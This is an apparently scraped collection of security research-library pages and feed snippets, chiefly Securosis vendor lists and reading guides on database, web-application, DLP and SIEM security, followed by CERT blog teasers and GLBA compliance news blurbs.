The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Database Security Platforms

* Application Security Inc. (DBProtect)
* Fortinet
* GreenSQL
* IBM (Guardium)
* Imperva (SecureSphere)
* McAfee (Sentrigo) (Nitro)
* Oracle (Secerno)

Database Vulnerability Assessment

* Application Security Inc. (AppDetective, DBProtect)
* Fortinet (IPLocks)
* IBM (Guardium)
* Imperva (DAS, Scuba)
* McAfee (Sentrigo)
* Oracle (mValent, Config. Packs)
* Qualys
* Tenable Network Security (Nessus)
* Next Generation Security Software (NGS) (Squirrel)

Database Encryption

* NetLib
* Oracle (TDE, API)
* Protegrity
* Prime Factors
* Relational Wizards
* RSA (Valyd)
* SafeNet (Ingrian)
* Sybase
* Thales (aka nCipher)
* Trustwave (Vericept)
* Voltage

Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content.

Database Auditing

* GreenSQL
* Oracle (Audit Vault)
* SoftTree Technologies (DB Audit Expert)
* Quest (InTrust for DB)

Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component.

Database Masking

* Axis Technology
* Camouflage
* dataguise
* Embarcadero
* Grid-Tools
* GreenSQL
* Hexaware/Akiva
* IBM (Optim/Princeton Softech)
* Informatica (ETL + Applimation)
* MENTiS Software
* Voltage (ETL + Dynamic)

Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provide some masking capabilities.

Database Vendors

* IBM
* Oracle (Oracle, MySQL)
* Sybase
* Teradata
* Apache (Derby)
* PostgreSQL (Postgres)
* Ingres (Open Ingres)

There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to be comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications.

==> Web Application Security

http://securosis.com/feeds/research

Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security.

By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example, web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8), as well as a couple of points we forgot to mention.
2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security).
3. The Risks of Trusting Content.
4. Web Application Security: We Need Web Application Firewalls to Work. Better.

General Coverage
------------

1. XML Security Overview
2. It’s Thursday the 13th—Update Adobe Flash Day
3. Heartland Hackers Caught; Answers and Questions
4. Using a Mac? Turn Off Java in Your Browser. We’re All Gonna Get Hacked is about the browser, not the app, but we’ll cross-reference it here.
5. There Are No Trusted Sites: Security Edition
6. Click-jacking Details, Analysis, and Advice.
7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general.
8. WAF vs. Secure Code vs. Dead Fish.
9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development.

Presentations
---------

* Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name.
* Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF)

Podcasts, Webcasts and Multimedia
---------

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu.

Web Application Assessment

* Cenzic
* HP
* Secure Works
* WhiteHat Security

Penetration Testing

* AppLabs
* Bonsai
* CGISecurity
* Core Security Technologies
* McAfee (Foundstone)
* Plynt
* Rvasi
* WindowSecurity.com

Static Source Code Review

* Aspect Security
* Cigital
* Fortify
* IBM
* Ounce
* Veracode

Dynamic Source Code Review

* Coverity
* Ounce
* Veracode

Web Application Firewalls

* armorlogic
* ArtofDefense Hyperguard
* Barracuda Networks
* Breach
* Cisco
* F5
* Fortify
* Fortinet
* Imperva
* Protegrity

Monitoring

All WAF vendors can monitor as well.

Education & Training

* SANS Institute
* SAIC

Most regional ISSA and ISACA chapters can provide assistance as well.

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research

This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well.

The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are at least as important.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. Barracuda Networks Acquires Purewire
2. McAfee Acquires MX Logic
3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over.
4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete.

General Coverage
------------

1. The First Phishing Email I Almost Fell For
2. I Heart Creative Spam
3. Spam Levels and Anti-Spam SaaS.
4. Hackers 1, Marketing 0.

Presentations
---------

PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section).

Podcasts, Webcasts and Multimedia
---------

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email us if you have any additions or corrections.

Vendors

* Aladdin
* Astaro
* Axway (Tumbleweed)
* Barracuda Networks
* Cisco (Ironport)
* Clearswift (MIMESweeper)
* Cloudmark
* CommTouch
* Google (Postini)
* Marshal8e6 (Mail Marshal + 8e6 Technologies)
* McAfee (IronMail, WebWasher, Secure Computing, CipherTrust)
* Proofpoint
* SonicWall (MailFrontier)
* Symantec (BrightMail and MessageLabs)
* WebSense

==> Research: Data Loss Prevention

http://securosis.com/feeds/research

We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis.

We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP.

Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free.

We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well.)

1. The most important piece of work we’ve published on CMP/DLP is our white paper, [Understanding and Selecting a Data Loss Prevention Solution](/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics: features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP.
2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed.
3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases).
4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases).
5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution.
6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention.
7. A short piece I did for Network World on DLP, and why it’s worth looking at now.
8. I’m a big proponent of full DLP solutions; this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem.
9. The dirty little secret of DLP.
10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP.
11. Then a post on how those two worlds will connect.
12. A Network World article I wrote on pitfalls of DLP.
13. A look at the differences between DLP, content classification, and e-discovery.
14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers.
15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term.

Presentations
---------

* Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper.

Podcasts, Webcasts and Multimedia
---------

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here.

Full Suite DLP

* CA (Orchestria)
* Code Green Networks
* EMC/RSA (Tablus)
* GTB Technologies
* McAfee (Reconnex)
* Symantec (Vontu)
* Vericept
* Websense (PortAuthority)
* Workshare

Network-only tools

* Clearswift
* Fidelis Security Systems
* Palisade Systems
* Proofpoint

Endpoint-only tools

* NextSentry
* Trend Micro (Provilla)
* Verdasys

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics, such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing.

Papers and Posts
------------

* Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development.
* How Common Applications Are (Now) the Weakest Link.
* Comments on “Containing Conficker” considers some of the challenges most application developers are up against.
* Immutable Log technologies help with auditing and event trail verification.
* For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well).
* Separation of Duties, Concept of Least Privilege, and other role-based user security measures.
* The Perils of the Insider Threat.
* PDF Security Pain, and stuff to think about on all script-enabled applications.
* A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools.

Presentations
---------

* Security + Agile = FAIL. Live presentation is here.
* This presentation covers Major Enterprise Application Security.

Podcasts, Webcasts and Multimedia

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments).

1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today.
2. LogLogic Acquires Exaprotect.
3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks.

General Coverage
------------

1. Policies and Security Products, covering the expense of policy creation and maintenance.

Presentations
---------

1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges.

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Vendors

* ArcSight
* CA
* CISCO MARS
* eIQ
* ExaProtect
* IBM
* Intellitactics
* LogLogic
* LogRhythm
* NetForensics
* NetIQ
* NitroSecurity
* Quest InTrust
* RSA EnVision
* Sensage
* Symantec SSIM
* Tenable
* TriGeo
* Q1 Labs

==> Project Quant

http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums:

* The Project Quant Blog and Landing Page
* The Project Quant Forums

Published project documents include:

* Version 1.0 of the Project Quant Report
* The Project Quant Survey Results Analysis

Here are the raw survey results from the project’s Open Patch Management Survey:

* Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CSV formats.)
* The survey is still active, and you can participate here.

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in the context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also shifts focus away from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is:

Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity.

Papers and Posts
------------

1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2.
2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection.
3. What is my motivation, or Why Are We Talking About ADMP.
4. ADMP and Assessment: Linking preventative and detective technologies.
5. ADMP: A Policy Driven Example.
6. Web Application Security: We Need Web Application Firewalls to Work. Better.
7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation.

Presentations
---------

* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

==> Phishing Techniques Steal Sensitive Data

http://www.baselinemag.com/rss-feeds-65.xml It's essential to deploy a variety of security tools and techniques, but the biggest problem revolves around workers who aren’t trained to spot phishing methods and sidestep attacks.

==> Companies Take Risks With Compliance

http://www.baselinemag.com/rss-feeds-65.xml Over the last decade, compliance has emerged as an enormous challenge for organizations large and small. Amid a spate of regulations and requirements, many companies are struggling to manage policies and regulations. A study of 200 North America IT and business executives conducted by DataMotion, provider of cloud-based data delivery services, indicates the severity of the problem. Nearly one in three respondents admitted that their organization knowingly takes compliance risks. "Data breaches are more prevalent than ever, and regulatory agencies are handing out millions of dollars in fines for privacy and security violations, yet this survey shows companies are still cutting corners," noted DataMotion Chief Technology Officer Bob Janacek. A main problem is caused by executives who believe a data breach is less expensive than the cost of compliance. What these executives fail to recognize, he says, is that "the price they'll pay goes far beyond compliance fines." Their brand is likely to take a hit, and their reputation will suffer.

==> Dos/DDoS Attacks Grow in Complexity

http://www.baselinemag.com/rss-feeds-65.xml As GoDaddy and Bank of America recently discovered, denial of service (DoS) attacks and distributed denial of service (DDoS) attacks are commonplace and increasingly sophisticated.

==> Protect Your Company With a CSIRT

http://www.baselinemag.com/rss-feeds-65.xml An effective computer security incident response team (CSIRT) can help your organization protect critical assets and data and lower risks by increasing awareness and creating controls.

==> Java 7 Attack Vectors, Oh My!

http://www.cert.org/blogs/vuls/rss.xml While researching how to successfully mitigate the recent Java 7 vulnerability (VU#636312, CVE-2012-4681), we (and by "we" I mean "Will Dormann") found quite a mess. In the midst of discussion about exploit activity and the out-of-cycle update from Oracle, I'd like to call attention to a couple other important points.

==> The Report "Network Profiling Using Flow" Released

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Austin Whisnant of the CERT Network Situational Awareness Team (NetSA). After a long time in the making, NetSA has published an SEI technical report on how to inventory assets on a network using network flow data. Knowing what assets are on your network, especially those visible to outsiders, is an important step in gaining network situational awareness.

==> Java Security Manager Bypass Vulnerability

http://www.cert.org/blogs/vuls/rss.xml Last Sunday, another major Java vulnerability (VU#636312) was reported. Until an official update is available, we strongly recommend disabling the Java 7 plug-in for web browsers.

==> CERT Failure Observation Engine 2.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder from the CERT Vulnerability Analysis team here. Back in April, we released version 1.0 of the CERT Failure Observation Engine (FOE), our fuzzing framework for Windows. Today we're announcing the release of FOE version 2.0. (Here's the download.) Although it has only been a few months since we announced FOE 1.0, our development cycle is such that FOE 2.0 actually reflects nearly a year of additional improvements over the 1.0 release. Our main focus in developing FOE 2.0 was to apply what we learned from creating the CERT Basic Fuzzing Framework version 2.5 for Linux and OS X to improve our fuzzing capabilities on Windows. We are gradually converging our code bases for BFF and FOE to simplify maintenance and the incorporation of new features. We're not quite there yet, but FOE 2.0 reflects a significant step in that direction. Read on for more details.

==> Vulnerability Data Archive

http://www.cert.org/blogs/vuls/rss.xml With the hope that someone finds the data useful, we're publishing an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database.

==> CERT Basic Fuzzing Framework 2.5 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder here. In addition to the recent introduction of our new Failure Observation Engine (FOE) fuzzing framework for Windows and Linux Triage Tools, we have updated the CERT Basic Fuzzing Framework (BFF) to version 2.5. This post highlights the significant changes.

==> CERT Linux Triage Tools 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml As part of the vulnerability discovery work at CERT, we have developed a GNU Debugger (GDB) extension called "exploitable" that classifies Linux application bugs by severity. Version 1.0 of the extension is available for public download here. This blog post contains an overview of the extension and how it works.

==> Vulnerability Severity Using CVSS

http://www.cert.org/blogs/vuls/rss.xml If you analyze, manage, publish, or otherwise work with software vulnerabilities, hopefully you've come across the Common Vulnerability Scoring System (CVSS). I'm happy to announce that US-CERT Vulnerability Notes now provide CVSS metrics.

==> CNAME flux

http://www.cert.org/blogs/vuls/rss.xml Hello this is Jonathan Spring. Recently, Leigh Metcalf and I uncovered some interesting results in our continuing work on properties of the Domain Name System (DNS). Our work involves an unconventional use of CNAME (canonical name) records. Besides an IP address, CNAME records are the only other location a domain may have in the DNS. Instead of an IP address, a CNAME record is a redirection or alias service that points to another name.

==> Challenges in Network Monitoring above the Enterprise

http://www.cert.org/blogs/vuls/rss.xml Recently George Jones, Jonathan Spring, and I attended USENIX Security '11. We hosted an evening Birds of a Feather (BoF) session where we asked a question of some significance to our CERT® Network Situational Awareness (NetSA) group: Is Large-Scale Network Security Monitoring Still Worth Effort?

==> Signed Java and Cisco AnyConnect

http://www.cert.org/blogs/vuls/rss.xml A few years ago, I published a blog entry called Signed Java Applet Security: Worse than ActiveX? In that entry, I explained the problems that arise when a vulnerability is discovered in a signed Java applet. Let's see how the Cisco AnyConnect vulnerability is affected.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2, which boasts additional features such as customized business processes and collaborative workflow capability, has been introduced by DocuLex, a content management software provider. WebSearch version 4.2 is a product of the DocuLex Archive Studio that helps organizations with decision-making power via automation of any business process through the benefit of systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice is released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar on April 14, 2010, creating a positive policy step forward for our industry. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> Advisers must know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Won't Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Friday's Wall Street Journal. (Use Google News to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as the Agencies) adopted final Model Privacy Notice forms for compliance with the Gramm-Leach-Bliley Act (GLBA) and its implementing regulation, the FTC's Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provides the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast abstracts the 8 workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about an effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA.

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations that must adhere to multiple requirements: 75 percent of organizations must comply with two or more regulations and corresponding audits, and more than 40 percent must comply with three or more regulations.

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzying; they include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers' information, no matter how much it costs to do so. In today's litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition of Guardium Created a Buzz in the Security Market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research analyst Chris McClean to learn what leading companies are doing for effective risk and compliance management and the steps you can take today. While risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, the additional complexity of stringent compliance and regulatory requirements, like SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more, adds a further layer of challenges for them. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance with federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to:

* Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes.
* Go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks.
* Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information.
* Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. He will also discuss how to transform a traditional data center that is inflexible and costly into a cloud computing environment that is secure, virtualized and automated, requiring less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Business-ready smartphone VoIP and unified communications (UC) are offered by Sipera SLiC. This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the company's system enables smartphone VoIP to include smart-card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad. Have you ever considered taking a role as the most senior person for information security at a large corporation? Then you must be prepared to understand the key principles of information security, and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

